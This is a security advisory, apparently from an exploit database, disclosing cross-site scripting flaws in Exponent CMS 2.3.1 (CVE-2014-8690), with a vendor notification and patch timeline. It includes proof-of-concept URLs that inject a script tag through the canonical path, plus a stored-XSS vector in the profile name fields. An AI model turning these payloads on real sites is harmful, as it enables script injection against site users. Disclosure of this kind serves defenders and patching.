###################### # Exploit Title: Multiple Exponent CMS Cross-Site Scripting Vulnerabilies # Discovered by- # Mayuresh Dani (mdani@qualys.com) # Narendra Shinde (nshinde@qualys.com) # Vendor Homepage: http://www.exponentcms.org/ # Software Link: http://sourceforge.net/projects/exponentcms/files/exponent-2.3.1.zip/download # Version: 2.3.1 # Date: 2014-10-11 # Tested on: Windows 7 / Mozilla Firefox # Ubuntu 14.04 / Mozilla Firefox # CVE: CVE-2014-8690 ###################### # Vulnerability Disclosure Timeline: # 2014-11-04: Discovered vulnerability # 2014-11-04: Vendor Notification # 2014-11-05: Vendor confirmation # 2014-11-06: Vendor fixes Universal XSS - http://www.exponentcms.org/news/security-patch-released-for-v2-1-4-v2-2-3-and-v2-3-0 # 2015-02-12: Public Disclosure ###################### # Description # Exponent CMS is a free, open source, open standards modular enterprise software framework and content management system (CMS) written in the PHP. # # CVE-2014-8690: # Universal XSS - Exponent CMS builds the canonical path field from an unsanitized URL, which can be used to execute arbitrary scripts. # Examples: # http://server/news/show/title/time-for-a-heavy-harvest-new-release/src/%22%3E%3Cscript%3Ealert%287%29%3C/script%3E@random4cd201e063d5c # http://server/news/show/title/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Etime-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c # http://server/news/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Eshow/title/time-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c # # 2.b. XSS in user profiles. # The "First Name" and "Last Name" fields on http://server/exponent/users/edituser are not sufficiently sanitized. Enter your favourite script and the application will execute it everytime for you. # # More information and PoCs - http://exponentcms.lighthouseapp.com/projects/61783/tickets/1230-universal-cross-site-scripting-in-exponent-cms-231-and-prior # # # Thanks, # Mayuresh & Narendra